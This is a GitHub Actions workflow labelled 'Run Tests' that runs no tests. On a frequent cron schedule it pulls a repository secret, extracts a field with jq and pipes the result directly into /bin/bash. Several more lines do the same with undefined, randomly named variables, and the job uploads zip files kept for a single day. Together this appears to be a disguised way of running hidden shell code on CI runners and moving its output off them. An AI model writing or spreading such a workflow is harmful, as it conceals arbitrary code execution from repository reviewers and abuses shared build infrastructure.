name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '37 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          tu03027: ${{ secrets.tu03027 }}
        run: |
          printf '%s' "$tu03027" | jq -r .copib37640 | /bin/bash
          printf '%s' "$mc00" | jq -r .zj89813 | /bin/bash
          echo $x5578 | jq -r .enchx00971 | /bin/bash
          printf '%s' "$fpyh3" | jq -r .k3952 | /bin/bash
          echo $wtat93189 | jq -r .kkzj7 | /bin/bash
          echo $mawue6685 | jq -r .nyj07 | /bin/bash
          echo $mb4 | jq -r .sa2 | /bin/bash
          printf '%s' "$csu0" | jq -r .rblo576 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: uyPJXzFc
          path: "*.zip"
          retention-days: 1
